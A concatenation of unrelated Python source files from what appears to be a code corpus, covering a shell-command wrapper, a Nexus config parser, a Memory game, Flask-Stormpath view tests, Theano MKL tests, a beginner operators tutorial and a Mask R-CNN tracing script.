oe = OutputError(process.stdout, process.stderr)
self.logger.debug("returning Output Error")
return oe
except OSError as error:
self.logger.error(error)
raise ConnectionError("Unable to execute '{0}'".format(SPACE.join((command, arguments))))
def __getattr__(self, command):
"""
:param:
- `command`: The command to call.
:return: The _procedure_call method
"""
def procedure_call(*args, **kwargs):
return self._procedure_call(command, *args, **kwargs)
return procedure_call
# end class LocalConnection
class LocalNixConnection(LocalConnection):
"""
A Class that uses Pexpect to get around the problem of file-buffering
So far as I know, Pexpect only works on *nix-based systems.
"""
def __init__(self, *args, **kwargs):
super(LocalNixConnection, self).__init__(*args, **kwargs)
self._logger = None
return
def run(self, command, arguments):
"""
runs the Pexpect command and puts lines of output on the Queue
:param:
- `command`: The shell command.
- `arguments`: A string of command arguments.
:postcondition: OutputError with output and error file-like objects
"""
if len(self.command_prefix):
command = SPACER.format(self.command_prefix,
command)
child = pexpect.spawn(SPACER.format(command, arguments), timeout=None)
line = None
output_queue = Queue.Queue()
output = StandardOutput(queue=output_queue)
error = StringIO('')
self.queue.put(OutputError(output, error))
while line != EOF:
try:
line = child.readline()
output_queue.put(line)
except pexpect.TIMEOUT:
self.logger.debug("pexpect.readline() timed out")
output_queue.put(line)
# end class LocalNixConnection
if __name__ == "__main__":
arguments = "-l"
lc = LocalConnection()
output = lc.ls(arguments='-l')
print output.output.read()
output = lc.ping(arguments="-c 10 192.168.0.1", timeout=1)
for x in output.output:
print x
print output.error.read()
output = lc.iperf('-i 1 -c localhost')
print output.output.read()
#lc = LocalNixConnection()
output = lc.iperf('-h')
print output.error.read()
#for line in output.output:
# print line
print output.output.read()
| 4,779 | 1,337 |
import os
import logging
import xml.etree.ElementTree as ET
from . import Security, Ldap
class Nexus:
def __init__(self):
self.log = logging.getLogger(__name__)
self.path = None
self.repos = None
self.repomap = None
self.dirty = True
self.ldap = Ldap()
self.security = Security()
def refresh(self, path):
repos, repomap = [], {}
self.path = None
self.repos = None
self.repomap = None
self.dirty = True
self.ldap.initialize()
self.security.initialize()
if path == None: return True
path = os.path.abspath(path)
caps = self.getYumCapabilities(path)
config = os.path.join(path, 'conf', 'nexus.xml')
self.log.info("Reading Nexus config from %s.", config)
if not os.path.isfile(config):
self.log.error("Nexus config file does not exist.")
return "Given path is not a valid Nexus instance."
try:
xml = ET.parse(config).getroot()
self.security.gettargets(xml)
for repo in xml.find('repositories').findall('repository'):
repodata = {}
repodata['id'] = repo.find('id').text
repodata['desc'] = repo.find('name').text
typ, layout = self.getPackType(caps, repo)
repodata['type'] = typ
repodata['layout'] = layout
self.getRepoClass(repo, repodata)
ext = repo.find('externalConfiguration')
policy = None
if ext != None: policy = ext.find('repositoryPolicy')
repodata['release'] = False
repodata['snapshot'] = False
if policy != None:
repodata['release'] = policy.text in ('RELEASE', 'MIXED')
repodata['snapshot'] = policy.text in ('SNAPSHOT', 'MIXED')
repos.append(repodata)
repomap[repodata['id']] = repodata
self.log.info("Successfully read Nexus config.")
except:
self.log.exception("Error reading Nexus config:")
return "Configuration file nexus.xml is not valid."
repos.sort(key=lambda x: x['class'])
self.ldap.refresh(path)
secrtn = self.security.refresh(path)
if secrtn != True: return secrtn
self.repos = repos
self.repomap = repomap
self.path = path
return True
def getRepoClass(self, repo, repodata):
ext = repo.find('externalConfiguration')
members, master = None, None
if ext != None:
members = ext.find('memberRepositories')
master = ext.find('masterRepositoryId')
remote = repo.find('remoteStorage')
local = repo.find('localStorage')
if local != None:
localurl = local.find('url')
if localurl != None:
lurl = localurl.text
if lurl[-1] != '/': lurl += '/'
repodata['localurl'] = lurl
if members != None:
repodata['class'] = 'virtual'
repodata['repos'] = []
for child in members.findall('memberRepository'):
repodata['repos'].append(child.text)
elif remote != None:
repodata['class'] = 'remote'
repodata['remote'] = remote.find('url').text
elif master != None: repodata['class'] = 'shadow'
else: repodata['class'] = 'local'
def getPackType(self, caps, repo):
if repo.find('id').text in caps: return 'yum', 'simple-default'
rtypes = ['maven1', 'maven2', 'npm', 'nuget', 'gems']
ltypes = ['bower', 'gradle', 'ivy', 'npm', 'nuget', 'sbt', 'vcs']
hint = repo.find('providerHint').text
if hint == None: return 'generic', 'simple-default'
subs = hint[hint.rfind('-'):]
if subs in ('-shadow', '-hosted', '-proxy', '-group'):
hint = hint[:hint.rfind('-')]
if hint == 'm2-m1': hint = 'maven1'
elif hint == 'm1-m2': hint = 'maven2'
elif hint == 'rubygems': hint = 'gems'
if hint not in rtypes: hint = 'generic'
layout = 'simple'
if hint in ltypes: layout = hint
elif hint == 'maven1': hint, layout = 'maven', 'maven-1'
elif hint == 'maven2': hint, layout = 'maven', 'maven-2'
return hint, layout + '-default'
def getYumCapabilities(self, path):
xml = os.path.join(path, 'conf', 'capabilities.xml')
if not os.path.isfile(xml): return []
yumrepos = []
root = ET.parse(xml).getroot()
for cap in root.find('capabilities').findall('capability'):
tid = cap.find('typeId').text
# TODO add 'yum.merge' to this list when Artifactory starts
# supporting virtual Yum repositories
if tid not in ('yum.generate', 'yum.proxy'): continue
props = {}
for prop in cap.find('properties').findall('property'):
props[prop.find('key').text] = prop.find('value').text
yumrepos.append(props['repository'])
return yumrepos
| 5,167 | 1,497 |
# implementation of card game - Memory
import simplegui
import random
# for repeatition check
# helper function to initialize globals
def new_game():
cards1 = range(0,8)
cards2 = range(0,8)
random.shuffle(cards1)
random.shuffle(cards2)
global cardDeck
cardDeck = cards1 + cards2
random.shuffle(cardDeck)
global exposed
exposed = [False] * 16
global turns, count
turns = [-1] * 2
count = 0
label.set_text("Turns = " + str(count))
# define event handlers
def mouseclick(pos):
# add game state logic here
global turns, count
# if its 1st Turn just flip (state 0)
if turns[0] == -1 and exposed[pos[0] / 50] == False:
turns[0] = pos[0] / 50
exposed[turns[0]] = True
# if its 2nd Turn (state 1)
elif turns[1] == -1 and exposed[pos[0] / 50] == False:
turns[1] = pos[0] / 50
exposed[turns[1]] = True
#increase overall count of turns after end of both turns
count += 1
label.set_text("Turns = " + str(count))
if False not in exposed:
label.set_text("Won the Game in " + str(count) + " Turns, Press Reset for New Game!" )
# if its 1st Turn (state 2)
elif turns[1] != -1 and exposed[pos[0] / 50] == False:
# if cards doesn't pair flip back both
if cardDeck[turns[0]] != cardDeck[turns[1]]:
exposed[turns[1]] = False
exposed[turns[0]] = False
turns[1] = -1
turns[0] = pos[0] / 50
exposed[turns[0]] = True
else:
turns[1] = -1
turns[0] = pos[0] / 50
exposed[turns[0]] = True
# cards are logically 50x100 pixels in size
def draw(canvas):
for index, card in enumerate(cardDeck):
if exposed[index] == True:
canvas.draw_polygon([(index*50, 0), ((index*50) + 50, 0), ((index*50) + 50, 100), (index*50 , 100)], 1, 'Black', 'White')
canvas.draw_text(str(card), ((index*50) + 10, 70), 65, 'Red')
else:
canvas.draw_polygon([(index*50, 0), ((index*50) + 50, 0), ((index*50) + 50, 100), (index*50 , 100)], 1, 'Black', 'Green')
# create frame and add a button and labels
frame = simplegui.create_frame("Memory", 800, 100)
frame.add_button("Reset", new_game)
label = frame.add_label("Turns = 0")
# register event handlers
frame.set_mouseclick_handler(mouseclick)
frame.set_draw_handler(draw)
# get things rolling
new_game()
frame.start()
| 2,523 | 917 |
'''
Created on Mar 22, 2018
@author: msanchez
'''
import requests
from html.parser import HTMLParser
import urllib
class WebUtilities(object):
def __init__(self):
''' Utility class. Has everything that has to do with web download / requests.
It may also create static HTML web pages.
Attributes:
content Part of the page which will form the main content, this is the main info to show.
title title which will be shown into HTML <h1> tags as main header.
'''
self.content = ""
def download(self, url):
''' Obtains complete request from an URL.
:param url: Complete url to download
:return: Complete request
:rtype: requests.Response
'''
page = requests.get(url)
page._content = self.__unescape(page)
return page
def web_status(self, url):
''' Pings a web and shows if it's reachable.
:return: online if status code == 200, else offline
:rtype: str
'''
status_code = urllib.request.urlopen(url).getcode()
return "online" if status_code == 200 else "offline" # todo: change to bool
def __unescape(self, page):
''' Removes HTML Entities. If not done, chars such as 'á' would appear as 'x/0f1' when read.
'''
parser = HTMLParser()
return parser.unescape(page.text)
def create_static_web(self, title):
''' Sets the title which will be shown to the given str and creates and empty content
:param title: str to set as the web's title
'''
self.content = ""
self.title = title
def append_paragraph(self, content):
''' Appends the given parameter as a part of the main content to be shown.
it does so appending it into <p> tags.
:param content: str to be added in a new line into <p> tags
'''
self.content += "<p>" + content + "</p>"
def build(self):
''' Main method to call when the rest of options are set. It will mount the title with the content
and return the whole web as a str.
:return: whole static web with appended title and content.
:rtype: str
'''
html_page = "<html><h1>" + self.title + "</h1>"
for entry in self.content:
html_page += entry
html_page += "</html>"
return html_page | 2,547 | 680 |
import abc
import logging
from typing import List, Optional
from asyncio import Queue
import zmq.asyncio
from zmq.error import ZMQBaseError
from schematics import Model
from schematics.types import StringType, IntType, ListType
class BaseSheep(metaclass=abc.ABCMeta):
"""
A base class for container adapters - classes that allow launching different kinds of containers.
"""
class Config(Model):
type: str = StringType(required=True)
port: int = IntType(required=True)
devices: List[str] = ListType(StringType, default=lambda: [])
_config: Config
def __init__(self, socket: zmq.asyncio.Socket, sheep_data_root: str):
"""
Create new :py:class:`BaseSheep`.
:param socket: socket for feeding sheep's runner with InputMessages
:param sheep_data_root: sheep data root with job working directories
"""
self._config: Optional[self.Config] = None
self.socket: zmq.asyncio.Socket = socket
self.jobs_queue: Queue = Queue() # queue of jobs to be processed
self.model_name: Optional[str] = None # current model name
self.model_version: Optional[str] = None # current model version
self.sheep_data_root: Optional[str] = sheep_data_root
self.in_progress: set = set() # set of job_ids which are currently sent for processing to the sheep's runner
def _load_model(self, model_name: str, model_version: str) -> None:
"""Tell the sheep to prepare a new model (without restarting)."""
self.model_name = model_name
self.model_version = model_version
def start(self, model_name: str, model_version: str) -> None:
"""
(Re)start the sheep with the given model name and version.
Any unfinished jobs will be lost, socket connection will be reset.
:param model_name: model name
:param model_version: model version
"""
if self.running:
self.slaughter()
self._load_model(model_name, model_version)
self.in_progress = set()
self.socket.connect("tcp://0.0.0.0:{}".format(self._config.port))
def slaughter(self) -> None:
zmq_address = 'tcp://0.0.0.0:{}'.format(self._config.port)
try:
self.socket.disconnect(zmq_address)
except ZMQBaseError:
logging.warning('Failed to disconnect socket (perhaps it was not started/connected)')
@property
@abc.abstractmethod
def running(self) -> bool:
"""Is the sheep running, i.e. capable of accepting computation requests?"""
| 2,585 | 746 |
class MetaVarList(list):
def __new__(cls, data=None, formatter=None):
cls._formatter = formatter
obj = super(MetaVarList, cls).__new__(cls, data)
return obj
def __str__(self):
return 'myList(%s)' % list(self)
def __format__(self, spec):
print(spec)
# flag = 'rnd_if_gt_'
return self._formatter.format(spec, list(self))
def __add__(self, other):
return MetaVarList(list(self) + list(other), formatter=self._formatter)
class MetaVarFormatter():
def __init__(self):
self.formats = {}
self.formats['comma'] = self._format_list
self.formats['list'] = self._format_md_list
def _format_list(self, values):
return ', '.join(list(values))
def _format_md_list(self, values):
_s = ''
for v in list(values):
_s += "- {} \n".format(v)
return _s
def format(self, type, values):
_fnc = self.formats.get(type, self._format_list)
return _fnc(values)
class SafeDict(dict):
def __missing__(self, key):
return '{' + key + '}'
def do_format(result):
print('''a_value:
{a:list}
b_value: {b:comma}
'''.format_map(result))
a = [{'a':'5'}, {'a':'6'}]
final = SafeDict({})
formatter = MetaVarFormatter()
for D in a:
for key, value in D.items(): # in python 2 use D.iteritems() instead
final[key] = final.get(key,MetaVarList(formatter=formatter)) + MetaVarList([value], formatter=formatter)
print(final['a'])
do_format(final) | 1,546 | 538 |
import theano
import unittest
import numpy
from nose.plugins.skip import SkipTest
from theano import tensor as T
from theano.tensor.nnet import conv2d
from theano.sandbox import mkl
numpy.random.seed(123)
if not mkl.mkl_available:
raise SkipTest('Optional package MKL disabled')
if theano.config.mode == 'FAST_COMPILE':
mode_with_mkl = theano.compile.mode.get_mode('FAST_RUN').including('mkl')
mode_without_mkl = theano.compile.mode.get_mode('FAST_RUN').excluding('mkl')
else:
mode_with_mkl = theano.compile.mode.get_default_mode().including('mkl')
mode_without_mkl = theano.compile.mode.get_default_mode().excluding('mkl')
class test_mkl_conv_forward(unittest.TestCase):
def test_conv_no_bias(self):
images = T.ftensor4('inputs')
weights = T.ftensor4('weights')
convOut = conv2d(images, weights, input_shape=(12, 3, 256, 256), filter_shape=(12, 3, 3, 3), filter_flip=False)
theano.printing.pydotprint(convOut, outfile="Conv_before_opt.png", var_with_name_simple=True)
fopt = theano.function(inputs=[images, weights], outputs=convOut, mode=mode_with_mkl)
theano.printing.pydotprint(fopt, outfile="Conv_OPT_after_opt.png", var_with_name_simple=True)
fori = theano.function(inputs=[images, weights], outputs=convOut, mode=mode_without_mkl)
theano.printing.pydotprint(fori, outfile="Conv_Original_after_opt.png", var_with_name_simple=True)
def test_conv_with_bias(self):
images = T.ftensor4('inputs')
weights = T.ftensor4('weights')
bias = T.vector('bias')
convOut = conv2d(images, weights, input_shape=(12, 3, 256, 256), filter_shape=(12, 3, 3, 3), filter_flip=False)
convOutBias = convOut + bias.dimshuffle('x', 0, 'x', 'x')
theano.printing.pydotprint(convOutBias, outfile="ConvBias_before_opt.png", var_with_name_simple=True)
fopt = theano.function(inputs=[images, weights, bias], outputs=convOutBias, mode=mode_with_mkl)
theano.printing.pydotprint(fopt, outfile="ConvBias_OPT_after_opt.png", var_with_name_simple=True)
fori = theano.function(inputs=[images, weights, bias], outputs=convOutBias, mode=mode_without_mkl)
theano.printing.pydotprint(fori, outfile="ConvBias_Original_after_opt.png", var_with_name_simple=True)
class test_mkl_conv_backward(unittest.TestCase):
def test_conv_no_bias(self):
images = T.ftensor4('input_conv')
weights = T.ftensor4('weights')
convOut = conv2d(images, weights, input_shape=(12, 3, 256, 256), filter_shape=(12, 3, 3, 3), filter_flip=False)
convOutSum = T.sum(convOut)
conv_op_di = T.grad(convOutSum, images)
conv_op_dk = T.grad(convOutSum, weights)
convOutBack = [conv_op_di, conv_op_dk]
theano.printing.pydotprint(convOutBack, outfile="ConvBack_before_opt.png", var_with_name_simple=True)
fopt = theano.function(inputs=[images, weights], outputs=convOutBack, mode=mode_with_mkl)
theano.printing.pydotprint(fopt, outfile="ConvBack_OPT_after_opt.png", var_with_name_simple=True)
fori = theano.function(inputs=[images, weights], outputs=convOutBack, mode=mode_without_mkl)
theano.printing.pydotprint(fori, outfile="ConvBack_Original_after_opt.png", var_with_name_simple=True)
def test_conv_with_bias(self):
images = T.ftensor4('input_conv')
weights = T.ftensor4('weights')
bias = T.vector('bias')
convOut = conv2d(images, weights, input_shape=(12, 3, 256, 256), filter_shape=(12, 3, 3, 3), filter_flip=False)
convOutSum = T.sum(convOut + bias.dimshuffle('x', 0, 'x', 'x'))
conv_op_di = theano.grad(convOutSum, images)
conv_op_dk = theano.grad(convOutSum, weights)
conv_op_db = theano.grad(convOutSum, bias)
convOutBack = [conv_op_di, conv_op_dk, conv_op_db]
theano.printing.pydotprint(convOutBack, outfile="ConvBiasBack_before_opt.png", var_with_name_simple=True)
fopt = theano.function(inputs=[images, weights, bias], outputs=convOutBack, mode=mode_with_mkl)
theano.printing.pydotprint(fopt, outfile="ConvBiasBack_OPT_after_opt.png", var_with_name_simple=True)
fori = theano.function(inputs=[images, weights, bias], outputs=convOutBack, mode=mode_without_mkl)
theano.printing.pydotprint(fori, outfile="ConvBiasBack_Original_after_opt.png", var_with_name_simple=True)
if __name__ == '__main__':
unittest.main()
| 4,462 | 1,665 |
"""Run tests against our custom views."""
from flask.ext.stormpath.models import User
from .helpers import StormpathTestCase
class TestRegister(StormpathTestCase):
"""Test our registration view."""
def test_default_fields(self):
# By default, we'll register new users with first name, last name,
# email, and password.
with self.app.test_client() as c:
# Ensure that missing fields will cause a failure.
resp = c.post('/register', data={
'email': 'r@rdegges.com',
'password': 'woot1LoveCookies!',
})
self.assertEqual(resp.status_code, 200)
# Ensure that valid fields will result in a success.
resp = c.post('/register', data={
'username': 'rdegges',
'given_name': 'Randall',
'middle_name': 'Clark',
'surname': 'Degges',
'email': 'r@rdegges.com',
'password': 'woot1LoveCookies!',
})
self.assertEqual(resp.status_code, 302)
def test_disable_all_except_mandatory(self):
# Here we'll disable all the fields except for the mandatory fields:
# email and password.
self.app.config['STORMPATH_ENABLE_USERNAME'] = False
self.app.config['STORMPATH_ENABLE_GIVEN_NAME'] = False
self.app.config['STORMPATH_ENABLE_MIDDLE_NAME'] = False
self.app.config['STORMPATH_ENABLE_SURNAME'] = False
with self.app.test_client() as c:
# Ensure that missing fields will cause a failure.
resp = c.post('/register', data={
'email': 'r@rdegges.com',
})
self.assertEqual(resp.status_code, 200)
# Ensure that valid fields will result in a success.
resp = c.post('/register', data={
'email': 'r@rdegges.com',
'password': 'woot1LoveCookies!',
})
self.assertEqual(resp.status_code, 302)
def test_require_settings(self):
# Here we'll change our backend behavior such that users *can* enter a
# first and last name, but they aren't required server side.
# email and password.
self.app.config['STORMPATH_REQUIRE_GIVEN_NAME'] = False
self.app.config['STORMPATH_REQUIRE_SURNAME'] = False
with self.app.test_client() as c:
# Ensure that registration works *without* given name and surname
# since they aren't required.
resp = c.post('/register', data={
'email': 'r@rdegges.com',
'password': 'woot1LoveCookies!',
})
self.assertEqual(resp.status_code, 302)
# Find our user account that was just created, and ensure the given
# name and surname fields were set to our default string.
user = User.from_login('r@rdegges.com', 'woot1LoveCookies!')
self.assertEqual(user.given_name, 'Anonymous')
self.assertEqual(user.surname, 'Anonymous')
def test_error_messages(self):
with self.app.test_client() as c:
# Ensure that an error is raised if an invalid password is
# specified.
resp = c.post('/register', data={
'given_name': 'Randall',
'surname': 'Degges',
'email': 'r@rdegges.com',
'password': 'hilol',
})
self.assertEqual(resp.status_code, 200)
self.assertTrue('Account password minimum length not satisfied.' in resp.data.decode('utf-8'))
self.assertFalse('developerMessage' in resp.data.decode('utf-8'))
resp = c.post('/register', data={
'given_name': 'Randall',
'surname': 'Degges',
'email': 'r@rdegges.com',
'password': 'hilolwoot1',
})
self.assertEqual(resp.status_code, 200)
self.assertTrue('Password requires at least 1 uppercase character.' in resp.data.decode('utf-8'))
self.assertFalse('developerMessage' in resp.data.decode('utf-8'))
resp = c.post('/register', data={
'given_name': 'Randall',
'surname': 'Degges',
'email': 'r@rdegges.com',
'password': 'hilolwoothi',
})
self.assertEqual(resp.status_code, 200)
self.assertTrue('Password requires at least 1 numeric character.' in resp.data.decode('utf-8'))
self.assertFalse('developerMessage' in resp.data.decode('utf-8'))
def test_redirect_to_login_and_register_url(self):
# Setting redirect URL to something that is easy to check
stormpath_redirect_url = '/redirect_for_login_and_registration'
self.app.config['STORMPATH_REDIRECT_URL'] = stormpath_redirect_url
with self.app.test_client() as c:
# Ensure that valid registration will redirect to
# STORMPATH_REDIRECT_URL
resp = c.post(
'/register',
data=
{
'given_name': 'Randall',
'middle_name': 'Clark',
'surname': 'Degges',
'email': 'r@rdegges.com',
'password': 'woot1LoveCookies!',
})
self.assertEqual(resp.status_code, 302)
location = resp.headers.get('location')
self.assertTrue(stormpath_redirect_url in location)
def test_redirect_to_register_url(self):
# Setting redirect URLs to something that is easy to check
stormpath_redirect_url = '/redirect_for_login'
stormpath_registration_redirect_url = '/redirect_for_registration'
self.app.config['STORMPATH_REDIRECT_URL'] = stormpath_redirect_url
self.app.config['STORMPATH_REGISTRATION_REDIRECT_URL'] = \
stormpath_registration_redirect_url
with self.app.test_client() as c:
# Ensure that valid registration will redirect to
# STORMPATH_REGISTRATION_REDIRECT_URL if it exists
resp = c.post(
'/register',
data=
{
'given_name': 'Randall',
'middle_name': 'Clark',
'surname': 'Degges',
'email': 'r@rdegges.com',
'password': 'woot1LoveCookies!',
})
self.assertEqual(resp.status_code, 302)
location = resp.headers.get('location')
self.assertFalse(stormpath_redirect_url in location)
self.assertTrue(stormpath_registration_redirect_url in location)
class TestLogin(StormpathTestCase):
"""Test our login view."""
def test_email_login(self):
# Create a user.
with self.app.app_context():
User.create(
given_name = 'Randall',
surname = 'Degges',
email = 'r@rdegges.com',
password = 'woot1LoveCookies!',
)
# Attempt a login using email and password.
with self.app.test_client() as c:
resp = c.post('/login', data={
'login': 'r@rdegges.com',
'password': 'woot1LoveCookies!',
})
self.assertEqual(resp.status_code, 302)
def test_username_login(self):
# Create a user.
with self.app.app_context():
User.create(
username = 'rdegges',
given_name = 'Randall',
surname = 'Degges',
email = 'r@rdegges.com',
password = 'woot1LoveCookies!',
)
# Attempt a login using username and password.
with self.app.test_client() as c:
resp = c.post('/login', data={
'login': 'rdegges',
'password': 'woot1LoveCookies!',
})
self.assertEqual(resp.status_code, 302)
def test_error_messages(self):
# Create a user.
with self.app.app_context():
User.create(
username = 'rdegges',
given_name = 'Randall',
surname = 'Degges',
email = 'r@rdegges.com',
password = 'woot1LoveCookies!',
)
# Ensure that an error is raised if an invalid username or password is
# specified.
with self.app.test_client() as c:
resp = c.post('/login', data={
'login': 'rdegges',
'password': 'hilol',
})
self.assertEqual(resp.status_code, 200)
#self.assertTrue('Invalid username or password.' in resp.data.decode('utf-8'))
self.assertTrue('Login attempt failed because the specified password is incorrect.' in resp.data.decode('utf-8'))
self.assertFalse('developerMessage' in resp.data.decode('utf-8'))
def test_redirect_to_login_and_register_url(self):
# Create a user.
with self.app.app_context():
User.create(
username = 'rdegges',
given_name = 'Randall',
surname = 'Degges',
email = 'r@rdegges.com',
password = 'woot1LoveCookies!',
)
# Setting redirect URL to something that is easy to check
stormpath_redirect_url = '/redirect_for_login_and_registration'
self.app.config['STORMPATH_REDIRECT_URL'] = stormpath_redirect_url
with self.app.test_client() as c:
# Attempt a login using username and password.
resp = c.post(
'/login',
data={'login': 'rdegges', 'password': 'woot1LoveCookies!',})
self.assertEqual(resp.status_code, 302)
location = resp.headers.get('location')
self.assertTrue(stormpath_redirect_url in location)
def test_redirect_to_register_url(self):
# Create a user.
with self.app.app_context():
User.create(
username = 'rdegges',
given_name = 'Randall',
surname = 'Degges',
email = 'r@rdegges.com',
password = 'woot1LoveCookies!',
)
# Setting redirect URLs to something that is easy to check
stormpath_redirect_url = '/redirect_for_login'
stormpath_registration_redirect_url = '/redirect_for_registration'
self.app.config['STORMPATH_REDIRECT_URL'] = stormpath_redirect_url
self.app.config['STORMPATH_REGISTRATION_REDIRECT_URL'] = \
stormpath_registration_redirect_url
with self.app.test_client() as c:
# Attempt a login using username and password.
resp = c.post(
'/login',
data={'login': 'rdegges', 'password': 'woot1LoveCookies!',})
self.assertEqual(resp.status_code, 302)
location = resp.headers.get('location')
self.assertTrue('redirect_for_login' in location)
self.assertFalse('redirect_for_registration' in location)
class TestLogout(StormpathTestCase):
"""Test our logout view."""
def test_logout_works_with_anonymous_users(self):
with self.app.test_client() as c:
resp = c.get('/logout')
self.assertEqual(resp.status_code, 302)
def test_logout_works(self):
# Create a user.
with self.app.app_context():
User.create(
given_name = 'Randall',
surname = 'Degges',
email = 'r@rdegges.com',
password = 'woot1LoveCookies!',
)
with self.app.test_client() as c:
# Log this user in.
resp = c.post('/login', data={
'login': 'r@rdegges.com',
'password': 'woot1LoveCookies!',
})
self.assertEqual(resp.status_code, 302)
# Log this user out.
resp = c.get('/logout')
self.assertEqual(resp.status_code, 302)
| 12,142 | 3,517 |
x = 9
y = 3
# Arithmetic Operators
print(x+y) #addtion
print(x-y) #subtraction
print(x*y) #multiplication
print(x/y) #division
print(x%y) #modulus provides remainder after we do long divison
print(x**y) #Exponentiation
x = 9.191823
print("Floor divide:", x//y) #Floor divison, how many times does a number evenly divide
print("Modulo: ", x%y)
# Assignement operators
x = 9 # set x = 9
x += 3 # x = x + 3
print(x)
x = 9
x -= 3 # x = x - 3
print(x)
x *= 3 # x = x * 3
print(x)
x /= 3 # x = x / 3
print(x)
x **= 3 # x = x ** 3
print(x)
# Comparison operators
x = 9
y = 3
print("Does x==y?", x==y) #True if x equals y, False otherwise
print("Does x!=y?", x!=y) #True if x does not equal y, False otherwise
print("Is x>y?", x>y) #True if x is greater than y, False otherwise
print("Is x<y?", x<y) #True if x is less than y, False otherwise
print("Is x>=y?", x>=y) #True if x is greater than or equal to y, False otherwise
print("Is x<=y?", x<=y) #True if x is less than or eqaul to y, False otherwise | 1,097 | 463 |
from django.db import models
# Create your models here.
class Car(models.Model):
car_name = models.CharField(max_length=50)
car_hostname = models.CharField(max_length=50)
car_state = models.CharField(max_length=50)
def __str__(self):
return self.car_name
def get_hostname(self):
return self.car_hostname
def get_state(self):
return self.car_state | 404 | 130 |
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import argparse
import cv2
from maskrcnn_benchmark.config import cfg
from predictor import COCODemo
import torch
import time
from PIL import Image
import numpy
from matplotlib import pyplot
def combine_masks_tuple(input_model):
# type: (Tuple[Tensor, Tensor, Tensor, Tensor, Tensor,Tensor]) -> Tensor
image_with_mask, bboxes, labels, masks, scores,palette=input_model
threshold=0.5
padding=1
contour=True
rectangle=False
height = 800
width = 800
#image_with_mask = image.clone()
for i in range(masks.size(0)):
color = ((palette * labels[i]) % 255).to(torch.uint8)
one_mask = my_paste_mask(masks[i, 0], bboxes[i], height, width, threshold, padding, contour, rectangle)
image_with_mask = torch.where(one_mask.unsqueeze(-1), color.unsqueeze(0).unsqueeze(0), image_with_mask)
return image_with_mask
def processImage(name,size, model):
pil_image =Image.open(name).convert("RGB")
pil_image = pil_image.resize((size, size), Image.BILINEAR)
image = torch.from_numpy(numpy.array(pil_image)[:, :, [2, 1, 0]])
image = (image.float()).permute(2, 0, 1) - torch.tensor(cfg.INPUT.PIXEL_MEAN)[:, None, None]
ImageFinal = image.unsqueeze(0).to(model.device)
return ImageFinal
def processImageCPU(name,size, model):
image2 =Image.open(name).convert("RGB")
image2 = image2.resize((size, size), Image.BILINEAR)
image2 = torch.from_numpy(numpy.array(image2)[:, :, [2, 1, 0]])
return image2
def my_paste_mask(mask, bbox, height, width, threshold=0.5, padding=1, contour=False, rectangle=False):
# type: (Tensor, Tensor, int, int, float, int, bool, bool) -> Tensor
padded_mask = torch.constant_pad_nd(mask, (padding, padding, padding, padding))
#print("mask.size(-1)",mask.size(-1))
scale = 1.0 + 2.0 * float(padding) / float(mask.size(-1))
#print("scale",scale)
center_x = (bbox[2] + bbox[0]) * 0.5
center_y = (bbox[3] + bbox[1]) * 0.5
w_2 = (bbox[2] - bbox[0]) * 0.5 * scale
h_2 = (bbox[3] - bbox[1]) * 0.5 * scale # should have two scales?
bbox_scaled = torch.stack([center_x - w_2, center_y - h_2,
center_x + w_2, center_y + h_2], 0)
TO_REMOVE = 1
w = (bbox_scaled[2] - bbox_scaled[0] + TO_REMOVE).clamp(min=1).long()
h = (bbox_scaled[3] - bbox_scaled[1] + TO_REMOVE).clamp(min=1).long()
scaled_mask = torch.ops.maskrcnn_benchmark.upsample_bilinear(padded_mask.float(), h, w)
x0 = bbox_scaled[0].long()
y0 = bbox_scaled[1].long()
x = x0.clamp(min=0)
y = y0.clamp(min=0)
#print("scaled_mask",scaled_mask.size())
leftcrop = x - x0
topcrop = y - y0
w = torch.min(w - leftcrop, width - x)
h = torch.min(h - topcrop, height - y)
#print("h",h,"w",w)
#mask = torch.zeros((height, width), dtype=torch.uint8)
#mask[y:y + h, x:x + w] = (scaled_mask[topcrop:topcrop + h, leftcrop:leftcrop + w] > threshold)
mask = torch.constant_pad_nd((scaled_mask[topcrop:topcrop + h, leftcrop:leftcrop + w] > threshold),
(int(x), int(width - x - w), int(y), int(height - y - h))) # int for the script compiler
if contour:
mask = mask.float()
# poor person's contour finding by comparing to smoothed
mask = (mask - torch.nn.functional.conv2d(mask.unsqueeze(0).unsqueeze(0),
torch.full((1, 1, 3, 3), 1.0 / 9.0), padding=1)[0, 0]).abs() > 0.001
if rectangle:
x = torch.arange(width, dtype=torch.long).unsqueeze(0)
y = torch.arange(height, dtype=torch.long).unsqueeze(1)
r = bbox.long()
# work around script not liking bitwise ops
rectangle_mask = ((((x == r[0]) + (x == r[2])) * (y >= r[1]) * (y <= r[3]))
+ (((y == r[1]) + (y == r[3])) * (x >= r[0]) * (x <= r[2])))
mask = (mask + rectangle_mask).clamp(max=1)
#print(mask.size())
return mask
def main():
parser = argparse.ArgumentParser(description="PyTorch Object Detection Webcam Demo")
parser.add_argument(
"--config-file",
default="../configs/caffe2/e2e_mask_rcnn_R_50_FPN_1x_caffe2.yaml",
metavar="FILE",
help="path to config file",
)
parser.add_argument(
"--confidence-threshold",
type=float,
default=0.7,
help="Minimum score for the prediction to be shown",
)
parser.add_argument(
"--min-image-size",
type=int,
default=224,
help="Smallest size of the image to feed to the model. "
"Model was trained with 800, which gives best results",
)
parser.add_argument(
"--show-mask-heatmaps",
dest="show_mask_heatmaps",
help="Show a heatmap probability for the top masks-per-dim masks",
action="store_true",
)
parser.add_argument(
"--masks-per-dim",
type=int,
default=2,
help="Number of heatmaps per dimension to show",
)
parser.add_argument(
"opts",
help="Modify model config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
args = parser.parse_args()
# load config from file and command-line arguments
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
# prepare object that handles inference plus adds predictions on top of image
coco_demo = COCODemo(
cfg,
confidence_threshold=args.confidence_threshold,
show_mask_heatmaps=args.show_mask_heatmaps,
masks_per_dim=args.masks_per_dim,
min_image_size=args.min_image_size,
)
start_time = time.time()
image = processImage("test.jpg",800,coco_demo)
image2 = processImageCPU("test.jpg",800,coco_demo)
coco_demo.single_image_to_top_predictions(image)
for p in coco_demo.model.parameters():
p.requires_grad_(False)
coco_demo.model = coco_demo.model.eval()
with torch.jit.optimized_execution(False):
traced_model = torch.jit.trace(coco_demo.single_image_to_top_predictions, image, check_trace=False)
traced_model.save('traced.pt')
print("done tracing")
print("testing first image:")
loaded = torch.jit.load("traced.pt")
boxes, labels, masks, scores = loaded(image)
